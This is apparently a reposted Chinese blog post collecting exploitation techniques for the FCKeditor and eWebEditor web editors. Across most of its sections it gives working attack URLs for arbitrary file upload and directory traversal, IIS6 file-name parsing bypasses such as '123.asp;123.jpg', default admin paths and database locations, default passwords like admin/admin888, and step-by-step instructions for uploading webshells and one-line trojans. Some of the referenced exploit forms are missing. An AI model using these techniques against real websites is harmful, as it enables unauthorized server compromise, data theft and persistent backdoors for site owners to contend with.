FCKeditor

FCKeditor編輯器頁/查看編輯器版本/查看文件上傳路徑

FCKeditor編輯器頁

FCKeditor/_samples/default.html ?查看編輯器版本

FCKeditor/_whatsnew.html

查看文件上傳路徑

fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

XML頁面中第二行 “url=/xxx”的部分就是默認基準上傳路徑

Note:[Hell1]截至2010年02月15日最新版本為FCKeditor v2.6.6

[Hell2]記得修改其中兩處asp為FCKeditor實際使用的腳本語言

FCKeditor被動限制策略所導致的過濾不嚴問題

影響版本: FCKeditor x.x <= FCKeditor v2.4.3

脆弱描述：

FCKeditor

v2.4.3中File類別默認拒絕上傳類型：html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2允許上傳asa、cer、php2、php4、inc、pwml、pht后綴的文件

上傳后 它保存的文件直接用的$sFilePath = $sServerDir .

$sFileName，而沒有使用$sExtension為后綴

直接導致在win下在上傳文件后面加個.來突破[未測試]

而在apache下，因為"Apache文件名解析缺陷漏洞"也可以利用之，詳見"附錄A"

另建議其他上傳漏洞中定義TYPE變量時使用File類別來上傳文件,根據FCKeditor的代碼，其限制最為狹隘。

攻擊利用: ?允許其他任何后綴上傳

利用2003路徑解析漏洞上傳網馬

影響版本: 附錄B

脆弱描述：

利用2003系統路徑解析漏洞的原理，創建類似“bin.asp”如此一般的目錄，再在此目錄中上傳文件即可被腳本解釋器以相應腳本權限執行。

攻擊利用:

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

FCKeditor PHP上傳任意文件漏洞

影響版本: FCKeditor 2.2 <= FCKeditor 2.4.2

脆弱描述：

FCKeditor在處理文件上傳時存在輸入驗證錯誤，遠程攻擊可以利用此漏洞上傳任意文件。

在通過editor/filemanager/upload/php/upload.php上傳文件時攻擊者可以通過為Type參數定義無效的值導致上傳任意腳本。

成功攻擊要求config.php配置文件中啟用文件上傳，而默認是禁用的。

攻擊利用: (請修改action字段為指定網址)： ?FCKeditor 《=2.4.2

for php.html ?Note:如想嘗試v2.2版漏洞，則修改Type=任意值

即可，但注意，如果換回使用Media則必須大寫首字母M,否則LINUX下，FCKeditor會對文件目錄進行文件名校驗，不會上傳成功的。

TYPE自定義變量任意上傳文件漏洞

影響版本: 較早版本

脆弱描述：

通過自定義Type變量的參數，可以創建或上傳文件到指定的目錄中去，且沒有上傳文件格式的限制。

攻擊利用:

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

打開這個地址就可以上傳任何類型的文件了，Shell上傳到的默認位置是:

http://www.heimian.com/UserFiles/all/1.asp

"Type=all"

這個變量是自定義的,在這里創建了all這個目錄,而且新的目錄沒有上傳文件格式的限制.

比如輸入:

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp

網馬就可以傳到網站的根目錄下. ?Note:如找不到默認上傳文件夾可檢查此文件:

fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor 新聞組件遍歷目錄漏洞

影響版本:aspx版FCKeditor，其余版本未測試

脆弱描述：如何獲得webshell請參考上文“TYPE自定義變量任意上傳文件漏洞”

攻擊利用:修改CurrentFolder參數使用 ../../來進入不同的目錄

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=aspx.asp

根據返回的XML信息可以查看網站所有的目錄。

/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor中webshell的其他上傳方式

影響版本:非優化/精簡版本的FCKeditor

脆弱描述：

如果存在以下文件，打開后即可上傳文件。

攻擊利用:

fckeditor/editor/filemanager/upload/test.html

fckeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor 文件上傳“.”變“_”下劃線的繞過方法

影響版本: FCKeditor => 2.4.x

脆弱描述：

我們上傳的文件例如：shell.php.rar或shell.php;.jpg會變為shell_php;.jpg這是新版FCK的變化。

攻擊利用: ?提交1.php+空格 就可以繞過去所有的,

※不過空格只支持win系統 *nix是不支持的[1.php和1.php+空格是2個不同的文件]

Note:upload/2010/3/201003102334372778.jpg

這樣的格式做了過濾。也就是IIS6解析漏洞。

上傳第一次。被過濾為123_asp;123.jpg 從而無法運行。

但是第2次上傳同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已經存在。

文件名被命名為123.asp;123(1).jpg …… 123.asp;123(2).jpg這樣的編號方式。

所以。IIS6的漏洞繼續執行了。

如果通過上面的步驟進行測試沒有成功，可能有以下幾方面的原因：

1.FCKeditor沒有開啟文件上傳功能，這項功能在安裝FCKeditor時默認是關閉的。如果想上傳文件，FCKeditor會給出錯誤提示。

2.網站采用了精簡版的FCKeditor，精簡版的FCKeditor很多功能丟失，包括文件上傳功能。

3.FCKeditor的這個漏洞已經被修復。eWebEditor

eWebEditor利用基礎知識

默認后臺地址：/ewebeditor/admin_login.asp

建議最好檢測下admin_style.asp文件是否可以直接訪問

默認數據庫路徑：

[PATH]/db/ewebeditor.mdb

[PATH]/db/db.mdb

某些CMS里是這個數據庫 ?也可嘗試

[PATH]/db/#ewebeditor.mdb -- 某些管理員自作聰明的小伎倆

使用默認密碼：admin/admin888 或 admin/admin 進入后臺，也可嘗試 admin/123456

(有些管理員以及一些CMS，就是這么設置的)

點擊“樣式管理”--可以選擇新增樣式，或者修改一個非系統樣式，將其中圖片控件所允許的上傳類型后面加上|asp、|asa、|aaspsp或|cer，只要是服務器允許執行的腳本類型即可，點擊“提交”并設置工具欄--將“插入圖片”控件添加上。而后--預覽此樣式，點擊插入圖片，上傳WEBSHELL，在“代碼”模式中查看上傳文件的路徑。

2、當數據庫被管理員修改為asp、asa后綴的時候，可以插一句話木馬服務端進入數據庫，然后一句話木馬客戶端連接拿下webshell

3、上傳后無法執行？目錄沒權限？帥鍋你回去樣式管理看你編輯過的那個樣式，里面可以自定義上傳路徑的！！！

4、設置好了上傳類型，依然上傳不了麼？估計是文件代碼被改了，可以嘗試設定“遠程類型”依照6.0版本拿SHELL的方法來做(詳情見下文↓)，能夠設定自動保存遠程文件的類型。

5、不能添加工具欄，但設定好了某樣式中的文件類型，怎么辦？↓這么辦！

(請修改action字段) ?Action.html ?eWebEditor踩腳印式入侵

脆弱描述：

當我們下載數據庫后查詢不到密碼MD5的明文時，可以去看看webeditor_style(14)這個樣式表，看看是否有前輩入侵過

或許已經賦予了某控件上傳腳本的能力，構造地址來上傳我們自己的shell

攻擊利用:

比如 ?ID=46 ?s-name =standard1 ?構造 代碼:

ewebeditor.asp?id=content&style=standard

ID和和樣式名改過后

ewebeditor.asp?id=46&style=standard1

eWebEditor遍歷目錄漏洞

脆弱描述： ?ewebeditor/admin_uploadfile.asp

admin/upload.asp ?過濾不嚴，造成遍歷目錄漏洞

攻擊利用:

第一種:ewebeditor/admin_uploadfile.asp?id=14

在id=14后面添加&dir=.. ?再加

&dir=../..

&dir=http://www.heimian.com/../.. 看到整個網站文件了

第二種: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir

=./..

eWebEditor 5.2 列目錄漏洞

脆弱描述： ?ewebeditor/asp/browse.asp

過濾不嚴，造成遍歷目錄漏洞

攻擊利用：

http://www.heimian.com/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..

利用WebEditor session欺騙漏洞,進入后臺

脆弱描述： ?漏洞文件:Admin_Private.asp

只判斷了session，沒有判斷cookies和路徑的驗證問題。

攻擊利用: ?新建一個test.asp內容如下:

分享：

喜歡

0

贈金筆

加載中，請稍候......

評論加載中，請稍候...

發評論

登錄名： 密碼： 找回密碼 注冊記住登錄狀態

昵???稱：

評論并轉載此博文

發評論

以上網友發言只代表其個人觀點，不代表新浪網的觀點或立場。

總結

以上是生活随笔為你收集整理的fckeditor 漏洞php,fckeditor上传漏洞利用总结的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。